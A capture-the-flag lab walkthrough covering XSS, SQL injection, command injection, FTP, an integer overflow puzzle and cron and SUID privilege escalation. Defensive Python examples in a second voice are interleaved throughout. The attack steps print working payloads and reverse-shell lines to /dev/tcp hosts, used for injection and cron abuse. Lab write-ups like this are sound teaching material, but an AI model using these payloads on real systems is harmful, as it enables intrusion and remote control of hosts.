Hackers Assemble 2: The Saga Completes
This article describes an upgraded version of the Hackers Assemble CTF challenge, covering web vulnerabilities (such as XSS and SQL injection), a network part (port scanning, an FTP service) and host security (privilege escalation). Hidden flags are obtained using techniques such as integer overflow and command injection, ending with escalation to root. 2025-9-7 13:31:34 Author: infosecwriteups.com

Abhishek Gupta

Hello, guys. This is an upgraded version of the Hackers Assemble CTF that I created. So what’s the change:

WEB

Ok, so let’s start with the web.

XSS

We have a search functionality here. It is for testing the XSS, as when I enter the classic payload <script>alert()</script>, the script and alert got sanitised, and I got this warning!

  • I tried many payloads, but it looks like script, alert, and onerror are blocked, so I tried a unique payload <svg onload=prompt()>. This doesn’t contain any of the blocked keywords, and it bypasses the restrictions.
  • So I can execute XSS. As per the warning, I have to fetch the flag, but let’s take a look at the hint first.

The JS code we have to use to get the flag is written here, which basically fetches the flag and then displays it.

I manually visited http://10.10.189.188/.fl4g.php, but it says Access Denied.

So I crafted a Payload to get the flag:

<svg onload="fetch('http://10.10.189.188/.fl4g.php').then(function(response) { return response.text(); }).then(function(flag) { document.body.innerHTML = flag; });">
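To make the filtering point concrete, here is an added Python example (mine, not the author's, and not the challenge's actual filter, whose code is not on the page): a keyword blocklist approximating the behaviour described above, beside plain HTML entity encoding of the reflected search term. The blocklist mangles the classic payload yet passes the <svg onload> payload through unchanged, while encoding neutralises both. BLOCKED_KEYWORDS and the helper names are assumptions.

```python
import html
import re

# Assumed approximation of the search page's filter: the write-up reports that
# "script", "alert" and "onerror" are blocked; the real filter is not shown.
BLOCKED_KEYWORDS = ("script", "alert", "onerror")


def blocklist_sanitise(user_input: str) -> str:
    """Weak approach: delete blocked keywords, case-insensitively, and trust the rest."""
    cleaned = user_input
    for word in BLOCKED_KEYWORDS:
        cleaned = re.sub(re.escape(word), "", cleaned, flags=re.IGNORECASE)
    return cleaned


def encode_for_html(user_input: str) -> str:
    """Robust approach for an HTML text context: encode <, >, &, " and ' as entities."""
    return html.escape(user_input, quote=True)


def render_results(query: str, sanitiser) -> str:
    """Mimics a results page that reflects the search term into the HTML body."""
    return f"<p>Results for: {sanitiser(query)}</p>"


def has_live_event_handler(fragment: str) -> bool:
    """Detection heuristic: a literal '<tag ... on*=' left in the output means a
    browser would still attach an inline event handler."""
    return re.search(r"<\s*[a-z][^>]*\son[a-z]+\s*=", fragment, re.IGNORECASE) is not None


if __name__ == "__main__":
    for payload in ("<script>alert(1)</script>", "<svg onload=prompt()>"):
        for name, fn in (("blocklist", blocklist_sanitise), ("encode", encode_for_html)):
            out = render_results(payload, fn)
            print(f"{name:9} {payload!r:32} -> handler survives: {has_live_event_handler(out)}")
```

The lesson for the defender is that a denylist of tag and attribute names can never enumerate every handler a browser recognises; encoding for the output context (here HTML text) removes the question entirely.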

SQLi

There is an Admin Panel, which is restricted, and I tried brute forcing, but that doesn’t work.

So I went to the products page, there

  • When I enter a in the input field, I get an SQL error.

  • So I tried for SQLi on these input fields.
  • I tried this payload ' or 1=1 -- - and dumped the secret credentials, which were left there in the products table.

  • With these creds, I logged into the Admin Panel and got the flag.
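The products search behaves the way it does because the search term is spliced into the SQL text. The following added Python example (my own, using an in-memory SQLite table; it is not the challenge's code, and the table rows are constructed) shows that pattern next to a parameterised query: the lone quote raises the SQL error seen above only in the vulnerable version, and the ' or 1=1 -- - payload returns every row only there.

```python
import sqlite3

# Constructed stand-in for the challenge's products table. The write-up says the
# secret credentials were left in this table; the row below is made up.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
INSERT INTO products (name, description) VALUES
  ('Keyboard', 'Mechanical keyboard'),
  ('Mouse', 'Wireless mouse'),
  ('admin_creds', 'CONSTRUCTED_PLACEHOLDER:not-a-real-password');
"""


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(term: str) -> list:
    """The pattern that produces the behaviour described above: the search term is
    spliced into the SQL text, so a quote changes the query's structure."""
    conn = fresh_db()
    sql = f"SELECT name, description FROM products WHERE name = '{term}'"
    return conn.execute(sql).fetchall()


def search_safe(term: str) -> list:
    """Parameterised query: the driver passes the term as data, never as SQL."""
    conn = fresh_db()
    sql = "SELECT name, description FROM products WHERE name = ?"
    return conn.execute(sql, (term,)).fetchall()


def single_quote_breaks_query(search_fn) -> bool:
    """Detection-style probe: does a lone quote raise a database error?
    True is the symptom the write-up describes (an SQL error on odd input)."""
    try:
        search_fn("'")
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    payload = "' or 1=1 -- -"
    print("vulnerable, quote error:", single_quote_breaks_query(search_vulnerable))
    print("vulnerable, rows:", len(search_vulnerable(payload)))
    print("safe, quote error:", single_quote_breaks_query(search_safe))
    print("safe, rows:", len(search_safe(payload)))
```

Beyond the query itself, the secret credentials should never have lived in a table the product search can read; parameterisation stops the injection, but least privilege on the database account limits what any future bug can reach.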

Hidden flag

So the question says, “Where am I? Hiding behind hidden paths, yeah, you may find listing some crazy things”.

So I ran dirb on the site and found out there was a directory named /assets, on which directory listing is enabled.

There is a file called Hidden. I went through it, and it has the flag.

Command Injection

I see a check connectivity utility, which checks if a given IP is up or not, but the output looks very similar to that of the ping command in Linux, so the server might be using our input in the ping command directly.

So I tried various command separators (; && & | ||) with the whoami command. I tried all of them, and & works for me.

So I decided to throw a reverse shell here, and I got one.

  • I ran an nc listener: nc -nvlp 12345
  • I entered this input with the command: 127.0.0.1$(bash -c "bash -i >& /dev/tcp/10.17.11.227/12345 0>&1")

  • The flag was in the www-data’s home dir.
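As an added example of how the connectivity checker should have been written (my code, not the challenge's, whose server side is not on the page), here is the unsafe shape beside a hardened one in Python: the hardened version accepts only a syntactically valid IPv4 address and runs ping as an argument vector with no shell, so separators and $(...) substitutions have nothing to act on. A small log-side check for the separators listed above is included for detection. Function names are assumptions.

```python
import ipaddress
import subprocess


def unsafe_shell_command(target: str) -> str:
    """The shape the observed behaviour suggests: user input pasted into a shell
    string. Returned rather than executed here, so its effect can be inspected."""
    return f"ping -c 1 {target}"


def build_ping_argv(target: str) -> list:
    """Hardened version: validate the input as an IPv4 address and build an argv
    list, so no shell ever parses what the user typed."""
    try:
        addr = ipaddress.IPv4Address(target.strip())
    except ipaddress.AddressValueError as exc:
        raise ValueError(f"rejected target {target!r}: {exc}") from exc
    return ["ping", "-c", "1", "-W", "2", str(addr)]


def is_accepted(target: str) -> bool:
    try:
        build_ping_argv(target)
        return True
    except ValueError:
        return False


def check_connectivity(target: str) -> bool:
    """Runs the validated command without a shell (shell=False is the default)."""
    argv = build_ping_argv(target)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return result.returncode == 0


def looks_like_injection(target: str) -> bool:
    """Log-side detection: flag submitted targets carrying shell metacharacters."""
    return any(ch in target for ch in ";&|`$")


if __name__ == "__main__":
    for submitted in ("10.10.189.188", "127.0.0.1 & whoami", "127.0.0.1$(id)"):
        print(f"{submitted!r:24} accepted={is_accepted(submitted)} "
              f"suspicious={looks_like_injection(submitted)}")
```

Validating the value as an address rather than filtering characters is the important choice: an allowlist of what a target may look like holds up even against separators nobody thought to block.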

Network

On running a full port scan, then a service scan on the open ports, I got this output.

nmap 10.10.189.188 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-01 15:13 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.11% done
Stats: 0:03:49 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 28.57% done; ETC: 15:26 (0:09:33 remaining)
Nmap scan report for 10.10.189.188
Host is up (0.17s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
7777/tcp open cbt
10021/tcp open unknown
25000/tcp open icl-twobase1

Nmap done: 1 IP address (1 host up) scanned in 1363.12 seconds

nmap 10.10.189.188 -p22,80,7777,10021,25000 -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-01 15:54 EDT
Stats: 0:02:40 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 15:57 (0:00:40 remaining)
Nmap scan report for 10.10.189.188
Host is up (0.18s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52
7777/tcp open cbt?
10021/tcp open ftp vsftpd 3.0.5
25000/tcp open icl-twobase1?
1 service unrecognized despite returning data.

FTP

We can see that an FTP service is running on port 10021, so I tried connecting to it.

  • I tried logging in with an anonymous login, and it was allowed.
  • I access ftp: ftp 10.10.48.70 -p 10021 with credentials anonymous:anonymous
  • But I was only able to see an image file here, and I am unable to get it as it is a large file, so my ftp gets stuck.
  • Upon thinking a lot, I try ls -al and see a hidden file named .flag.txt

  • I get the flag onto my machine and read it.

Integer Overflow puzzle

The question states that there is a fishy port open.

  • We have two unidentified ports here, 25000 and 7777, so I tried connecting them via nc for banner grabbing: nc <ip> 7777
  • On Port 7777, there is a binary running
  • When I enter small numbers, it sums them up and gives me the output, but when I enter a large number, it says large number.
  • So I tried entering the highest value an integer can hold
  • I got the flag, but it was encoded with ROT13, so I went to dcode.fr, decoded it and got the flag
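The puzzle on port 7777 illustrates a common mistake: each operand is bounds-checked ("large number" when a single value does not fit), but the sum of two in-range operands is never checked, so it wraps. The following added Python example (mine, not the challenge binary, whose logic is not on the page and is only assumed here) simulates 32-bit signed arithmetic to show the wrap-around and the fix of checking the result as well as the inputs.

```python
INT32_MIN = -2**31
INT32_MAX = 2**31 - 1


def wrap_int32(value: int) -> int:
    """Reduce an unbounded Python int to what a 32-bit signed C int would hold."""
    return (value + 2**31) % 2**32 - 2**31


def parse_operand(text: str) -> int:
    """Per-operand bound check, assumed to be the only validation the service does:
    a value that does not fit in 32 bits is refused with 'large number'."""
    value = int(text.strip())
    if not INT32_MIN <= value <= INT32_MAX:
        raise ValueError("large number")
    return value


def operand_accepted(text: str) -> bool:
    try:
        parse_operand(text)
        return True
    except ValueError:
        return False


def sum_unchecked(a_text: str, b_text: str) -> int:
    """Both operands pass the check, but the sum is formed in 32-bit arithmetic
    and silently wraps (the behaviour the puzzle rewards)."""
    return wrap_int32(parse_operand(a_text) + parse_operand(b_text))


def sum_checked(a_text: str, b_text: str) -> int:
    """Fix: check the result, not just the inputs."""
    total = parse_operand(a_text) + parse_operand(b_text)
    if not INT32_MIN <= total <= INT32_MAX:
        raise OverflowError("sum does not fit in a 32-bit integer")
    return total


def overflows(a_text: str, b_text: str) -> bool:
    try:
        sum_checked(a_text, b_text)
        return False
    except OverflowError:
        return True


if __name__ == "__main__":
    print("2 + 3 =", sum_unchecked("2", "3"))
    print("INT_MAX + 1 (unchecked) =", sum_unchecked(str(INT32_MAX), "1"))
    print("INT_MAX + 1 overflows:", overflows(str(INT32_MAX), "1"))
```

In real C code the equivalent fix is to use a checked addition (for example the compiler builtins for overflow-checked arithmetic) or to test the operands against INT_MAX minus the other operand before adding, because signed overflow there is undefined behaviour rather than a predictable wrap.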

Host

From the shell we have from OS command injection, we shall start spreading our legs on the target host.

User Flag

On Checking Crontabs on the system, I found a cron job running as ctfuser every minute.

www-data@hackersassemble:/var/www/html$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * ctfuser /home/ctfuser/maintenance.sh

  • On checking the file’s permission, on which the crontab was set, I found out that anyone can execute it. It has read, write and execute permission for all the users.

  • So I then added a reverse shell into this file and waited for the cron job to execute, and got a reverse shell as ctfuser
  • echo "sh -i >& /dev/tcp/<yourIP>/8888 0>&1" >> /home/ctfuser/maintenance.sh

  • I went to the home directory of ctfuser and got the flag
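The cron weakness above is easy to audit for. Here is an added Python example (my own, not part of the write-up or the room) that parses a system crontab in the format shown, stats every existing absolute path each job refers to, and reports scripts that are writable by group or others or owned by someone other than root or the job's user. It builds its own throwaway copy of maintenance.sh with mode 0777 so it runs offline; the crontab text is constructed from the listing above, and the function names are assumptions.

```python
import os
import pwd
import re
import stat
import tempfile

# Constructed crontab modelled on the listing above; the script path is filled in
# by build_demo_environment() so the file really exists with the weak permissions.
CRONTAB_TEMPLATE = """# /etc/crontab: system-wide crontab
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * ctfuser {script}
"""


def parse_system_crontab(text: str):
    """Yield (user, command) for each job line of a system crontab
    (five time fields or an @keyword, then the user field, then the command)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        keyword_form = line.startswith("@")
        fields = line.split(None, 2) if keyword_form else line.split(None, 6)
        if len(fields) < (3 if keyword_form else 7):
            continue
        yield fields[-2], fields[-1]


def audit_job(user: str, command: str) -> list:
    """Return findings for every existing regular file the command names by absolute path."""
    findings = []
    try:
        job_uid = pwd.getpwnam(user).pw_uid
    except KeyError:
        job_uid = None  # account unknown on this host: skip the ownership check
    for token in command.split():
        if not token.startswith("/") or not os.path.isfile(token):
            continue
        st = os.stat(token)
        mode = stat.S_IMODE(st.st_mode)
        if mode & stat.S_IWOTH:
            findings.append(f"{token}: world-writable ({oct(mode)}), executed as {user}")
        elif mode & stat.S_IWGRP:
            findings.append(f"{token}: group-writable ({oct(mode)}), executed as {user}")
        if job_uid is not None and st.st_uid not in (0, job_uid):
            findings.append(f"{token}: owned by uid {st.st_uid}, not root or {user}")
    return findings


def audit_crontab(text: str) -> list:
    findings = []
    for user, command in parse_system_crontab(text):
        findings.extend(audit_job(user, command))
    return findings


def build_demo_environment():
    """Create a temp maintenance.sh with mode 0777, mirroring the weakness above."""
    directory = tempfile.mkdtemp(prefix="cron-audit-")
    script = os.path.join(directory, "maintenance.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\necho maintenance\n")
    os.chmod(script, 0o777)
    return CRONTAB_TEMPLATE.format(script=script), script


def harden_script(path: str) -> None:
    """Owner-only write; everyone else may still read and execute."""
    os.chmod(path, 0o755)


if __name__ == "__main__":
    crontab_text, script_path = build_demo_environment()
    print("before:", audit_crontab(crontab_text))
    harden_script(script_path)
    print("after: ", audit_crontab(crontab_text))
```

Run against the real /etc/crontab (and the files in /etc/cron.d) this is the check that would have caught the room's maintenance.sh before anyone else did; the same logic extends to the directories those scripts live in, since a writable parent directory lets the file be replaced outright.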

Root Flag

I first spawned a Python pty shell.

  • python3 -c 'import pty;pty.spawn("/bin/bash")'
  • I looked for binaries that have SUID set on them: find / -perm -4000 -type f 2>/dev/null

  • I found a binary named watch, so I looked into GTFObins and found a way to escalate privilege using this binary.
  • I ran the command and got a root shell: watch -x sh -p -c 'reset; exec sh -p 1>&0 2>&0'

  • I got an error, but with the help of ChatGPT, I first set a standard terminal type and ran the command and got a root shell.

Hidden Root Flag

  • We have already stumbled upon the same thing in FTP, so I did ls -al and got the hidden flag.

I hope you liked this Room. Show some, I might bring some more rooms like this and this time, more difficult and broader. If you need challenges for anything special, drop a comment.

Do follow me on LinkedIn: Let’s Grow Together : https://www.linkedin.com/in/abhishek26gupta/


Source: https://infosecwriteups.com/hackers-assemble-2-the-saga-completes-590f4813812a?source=rss----7b722bfd1b8d--bug_bounty